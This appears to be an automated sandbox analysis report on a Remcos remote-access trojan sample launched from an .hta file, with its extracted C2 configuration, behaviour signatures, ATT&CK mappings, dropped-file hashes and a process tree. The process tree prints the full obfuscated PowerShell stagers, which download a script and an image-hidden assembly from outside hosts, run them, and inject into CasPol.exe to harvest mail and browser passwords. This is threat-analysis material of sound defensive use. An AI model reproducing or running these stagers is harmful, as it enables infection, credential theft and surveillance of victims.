remcos | 986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23-01-2025 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

24d95803236fde4ee8ebfe4671dc28fe.hta
Size

1.2MB
MD5

24d95803236fde4ee8ebfe4671dc28fe
SHA1

677e9c8b79a59b4fa3c8eab8fd318ae31dcd5d95
SHA256

986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c
SHA512

272adc89c2eedbfd065e3fa54edcb27211db44b998f3e5479cc53c6954c0b37db16e6d2eac0977c040068da07da651f8d9adc440d97e65bbdcb53afb0c4670a0
SSDEEP

768:tJnbjKx80AIu6GTs1A5fRgd4m2hX3IpXj1x+mLvGNtGLN0Go5cLzLWpXj1x5aGIA:tt

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

abeangana.duckdns.org:1121

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B9B8CE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2544-101-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2584-100-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2416-105-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2544-101-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/2584-100-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	2784	powershell.exe
6	2012	powershell.exe
8	2012	powershell.exe
9	2012	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2784	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2012	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2012 set thread context of 3028	2012	powershell.exe	38
PID 3028 set thread context of 2584	3028	CasPol.exe	39
PID 3028 set thread context of 2544	3028	CasPol.exe	40
PID 3028 set thread context of 2416	3028	CasPol.exe	41

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2784	powershell.exe
2012	powershell.exe
2584	CasPol.exe
2584	CasPol.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3028	CasPol.exe
3028	CasPol.exe
3028	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2416	CasPol.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 432 wrote to memory of 2776	432	mshta.exe	29
PID 432 wrote to memory of 2776	432	mshta.exe	29
PID 432 wrote to memory of 2776	432	mshta.exe	29
PID 432 wrote to memory of 2776	432	mshta.exe	29
PID 2776 wrote to memory of 2784	2776	cmd.exe	31
PID 2776 wrote to memory of 2784	2776	cmd.exe	31
PID 2776 wrote to memory of 2784	2776	cmd.exe	31
PID 2776 wrote to memory of 2784	2776	cmd.exe	31
PID 2784 wrote to memory of 2696	2784	powershell.exe	32
PID 2784 wrote to memory of 2696	2784	powershell.exe	32
PID 2784 wrote to memory of 2696	2784	powershell.exe	32
PID 2784 wrote to memory of 2696	2784	powershell.exe	32
PID 2696 wrote to memory of 2924	2696	csc.exe	33
PID 2696 wrote to memory of 2924	2696	csc.exe	33
PID 2696 wrote to memory of 2924	2696	csc.exe	33
PID 2696 wrote to memory of 2924	2696	csc.exe	33
PID 2784 wrote to memory of 2812	2784	powershell.exe	35
PID 2784 wrote to memory of 2812	2784	powershell.exe	35
PID 2784 wrote to memory of 2812	2784	powershell.exe	35
PID 2784 wrote to memory of 2812	2784	powershell.exe	35
PID 2812 wrote to memory of 2012	2812	WScript.exe	36
PID 2812 wrote to memory of 2012	2812	WScript.exe	36
PID 2812 wrote to memory of 2012	2812	WScript.exe	36
PID 2812 wrote to memory of 2012	2812	WScript.exe	36
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 2012 wrote to memory of 3028	2012	powershell.exe	38
PID 3028 wrote to memory of 2584	3028	CasPol.exe	39
PID 3028 wrote to memory of 2584	3028	CasPol.exe	39
PID 3028 wrote to memory of 2584	3028	CasPol.exe	39
PID 3028 wrote to memory of 2584	3028	CasPol.exe	39
PID 3028 wrote to memory of 2584	3028	CasPol.exe	39
PID 3028 wrote to memory of 2544	3028	CasPol.exe	40
PID 3028 wrote to memory of 2544	3028	CasPol.exe	40
PID 3028 wrote to memory of 2544	3028	CasPol.exe	40
PID 3028 wrote to memory of 2544	3028	CasPol.exe	40
PID 3028 wrote to memory of 2544	3028	CasPol.exe	40
PID 3028 wrote to memory of 2416	3028	CasPol.exe	41
PID 3028 wrote to memory of 2416	3028	CasPol.exe	41
PID 3028 wrote to memory of 2416	3028	CasPol.exe	41
PID 3028 wrote to memory of 2416	3028	CasPol.exe	41
PID 3028 wrote to memory of 2416	3028	CasPol.exe	41

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\24d95803236fde4ee8ebfe4671dc28fe.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:432
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4lfzuvbp.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2696
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2B94.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC2B93.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2924
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2812
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2012
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\flwmksffxsqtdpyepbd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2584
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\qfcellpgkaiyfvuiyeqmbuk"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:2544
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\azhxmdaayiakpbimppcgmgewfs"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4lfzuvbp.dll

Filesize
3KB

MD5
596fe015f8817613475ebb9eb8c09efa

SHA1
bd441eb6af0a7355be866a6a6beba52e695a9eb0

SHA256
899e97429554e2a5b375cba8511f9779cbab8c8d0f125c73c4f92c12167f666a

SHA512
169158d46b0bf58c1e0434313e26928f23b4c21bb85b0dfdfca5d2751476b2ff91ebd30ea160c77383220b65a00944e04d552c573c025db281d1bbc5fd549b97

Download Submit
C:\Users\Admin\AppData\Local\Temp\4lfzuvbp.pdb

Filesize
7KB

MD5
9abbb151675789bd6c17585392bf8d79

SHA1
f13849b39118194bb76fcfc045446c5144e82e39

SHA256
fb42e3a39b6cfbbcd3a788d6320c718431350b3435159e61005ebcffdcae2cce

SHA512
32a0e9b84244e85d41f4bd68de76975a1a497513996d1a8327cca02b0976c3ee50975c9be432cb5525df44b1657ad82ef9ab5678206bc11344859c1e582264dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab40CA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2B94.tmp

Filesize
1KB

MD5
799692a485a50fd357bdfaffec9eeedf

SHA1
d238e1472b97c69877a30963adab3a663a580caa

SHA256
58b3a2f9345a0bd9aa3827f4630566b9c0e6404a66ba2c4fcab37a86973a9d8d

SHA512
c973ffa11c3a1f8ee9ecfb61eedf917a214e55b3babe249a56a71ff4751b05a152bc41dcaa451f17400fbce43f1b169075eb0b4f1074fb1d5cd7b26db4d7d56d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4188.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\flwmksffxsqtdpyepbd

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
468d2f16d371fa85ea4834702a65f0bf

SHA1
84cf21f171f6ec750b912264a5da777e4704e41a

SHA256
67fd0fc0474df30556b192705cac0af998ef4d0f31550081bf07ed0270163791

SHA512
bc8e2401f3b2d46e5a207aaba9b8170ad775a441ccf9c020293cf006fcefc5a944791b4df54d4a418fbe41896b869f7ae20670a2f1241ade202ba013cbc3130b

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs

Filesize
205KB

MD5
0e3b19cc6060bed0436e01fe8bc04c44

SHA1
8b99c60c35d7650ed451e3996bcccb7e9f51b7cf

SHA256
35315b1e950898c156611a9074ea43debd10d09098b855e9bfba76eef6ec3d17

SHA512
ad3267ee13123bebd28cee00cb2e128f0bf6213520378b5a45aa9d31b858f140612e2e6aee5d62be3a187af7c004de10ae1f0930e8133dc71c93f011fbde29e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lfzuvbp.0.cs

Filesize
486B

MD5
3b886b3aeeb8599b37fc0be4fe6ae9d8

SHA1
b6d0a2488bd50c1b7f96cae0e91bdc3a083a5a7e

SHA256
b1dece05fc9ac39567b6cd75ae891827264b7d3606d5996807f1e88840e2c33e

SHA512
ecc3d89869a074e00b7dbb0c3fbe07fd534cb2a100ef6280ffc3f02f66ace38526746761b216061e5d7d519f0b685a1b89a2f51c4e24d8ee900b77b949268458

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4lfzuvbp.cmdline

Filesize
309B

MD5
a34108af43f32b3890014b4cc08ff812

SHA1
3012440e2f19274cc33688b9571f86571b4d308b

SHA256
3f7f9dded66bc9a1b1b8088ba258cabb9f624df54932de667c5fcbfcb4fe37cd

SHA512
fb4962695086e8193bd7fe709b06c8a62998f6bce2f7f7b117ed86153ac466ae08c775362d87b8116737184469db46e3cebdf9bf5400daee650cfcf06345b126

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC2B93.tmp

Filesize
652B

MD5
852d5e7b68807c516f984857f90de3a1

SHA1
ba375d5a54bc7307b013b1211311ae696447d459

SHA256
0a571307aaa94daa369aced6b7a06d60e0e24a7a0381426a6aeb4e62ad24bae5

SHA512
f237d78fa347e2c255a34c8a687931d891e37b74eb1b0e334f4509239b2e9536444df34e1f3cd425cec91a94fc13a11433042fe9fd03d19c64d9619554df8b10

Download Submit
memory/2416-105-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2416-104-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2416-103-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2544-97-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2544-98-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2544-101-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2544-99-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2584-95-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2584-96-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2584-100-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3028-79-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-77-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-90-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3028-91-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
